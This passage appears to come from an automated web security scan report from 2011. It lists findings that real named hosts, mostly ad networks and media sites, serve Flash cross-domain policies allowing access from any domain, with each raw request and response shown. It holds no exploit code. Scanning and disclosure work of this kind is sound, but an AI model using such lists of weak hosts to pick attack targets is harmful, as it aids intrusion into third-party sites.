Age: 0
Content-Length: 225
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.20. http://cdn.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:30 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 06 Jan 2011 14:11:13 GMT
ETag: "578002-199-4992e12fda240"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
Cache-Control: private, max-age=31536000
Age: 9996468
Expires: Fri, 13 Jan 2012 22:50:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

3.21. http://cr0.worthathousandwords.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cr0.worthathousandwords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cr0.worthathousandwords.com

Response

HTTP/1.0 200 OK
Content-Length: 305
Content-Type: text/xml
Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT
Accept-Ranges: bytes
ETag: "4a57df31d345c91:303"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3600
Date: Mon, 09 May 2011 15:38:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

3.22. http://d7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 1842867593 1842831716
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=475
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.23. http://ds.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 09 May 2011 15:39:06 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.24. http://event.adxpose.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1304614332000"
Last-Modified: Thu, 05 May 2011 16:52:12 GMT
Content-Type: application/xml
Content-Length: 203
Date: Mon, 09 May 2011 15:35:21 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

3.25. http://finance.fox8live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: finance.fox8live.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:36:57 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.26. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 01:12:03 GMT
Expires: Thu, 05 May 2011 01:09:19 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 51816
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.27. http://fw.adsafeprotected.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fw.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1304446860000"
Last-Modified: Tue, 03 May 2011 18:21:00 GMT
Content-Type: application/xml
Content-Length: 202
Date: Mon, 09 May 2011 15:39:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.28. http://gannett.gcion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

3.29. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2ae5"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web205
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.30. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.31. http://ic.nexac.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ic.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ic.nexac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:39 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.32. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Mar 2011 22:34:09 GMT
Accept-Ranges: bytes
ETag: "f2db35f1e0ddcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:37:52 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.33. http://k.collective-media.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain. It additionally permits any domain to send arbitrary HTTP request headers (allow-http-request-headers-from domain="*" headers="*"), so a SWF hosted on any site can attach custom headers to requests it makes to this host.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: k.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Mon, 06-Jun-2011 15:37:00 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

3.34. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:38:10 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.35. http://map.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 09 May 2011 15:35:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.36. http://metrics.csmonitor.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.csmonitor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.csmonitor.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:21 GMT
Server: Omniture DC/2.0.0
xserver: www315
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.37. http://metrics.npr.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:57 GMT
Server: Omniture DC/2.0.0
xserver: www55
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.38. http://mobile.fox8live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mobile.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Accept-Ranges: bytes
ETag: "0b66c58755c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:41:45 GMT
Connection: close
Content-Length: 121

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.39. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 09 May 2011 15:36:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.40. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:35:02 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 09 May 2011 15:35:02 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.41. http://radar.weather.gov/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: radar.weather.gov

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 09 Jul 2010 21:50:42 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 167
Content-Type: text/xml
Cache-Control: max-age=11175
Expires: Mon, 09 May 2011 18:42:55 GMT
Date: Mon, 09 May 2011 15:36:40 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="SOAPAction"/>
</cross-domain-policy>

3.42. http://s.meebocdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.meebocdn.net

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 03 May 2011 00:23:33 GMT
ETag: "3934951678"
Content-Type: text/xml
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:35:00 GMT
Server: lighttpd/1.4.19
Cache-Control: private, max-age=604800
Age: 59442
Expires: Sun, 15 May 2011 23:04:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="False"/>
<allow-access-from domain="*.meebo.com" secure="False"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
<allow-access-from domain="*.meebocdn.net" secure="False"/>
...[SNIP]...

3.43. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 02:46:13 GMT
Expires: Tue, 10 May 2011 02:46:13 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 46132

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.44. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:19 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:35:19 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

3.45. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:35:40 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.46. http://spd.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:15b0"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.47. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:35:10 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.48. http://stp.fox8live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stp.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stp.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Accept-Ranges: bytes
ETag: "0b66c58755c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close
Content-Length: 121

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.49. http://t.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "5d240b9-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

3.50. http://t.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
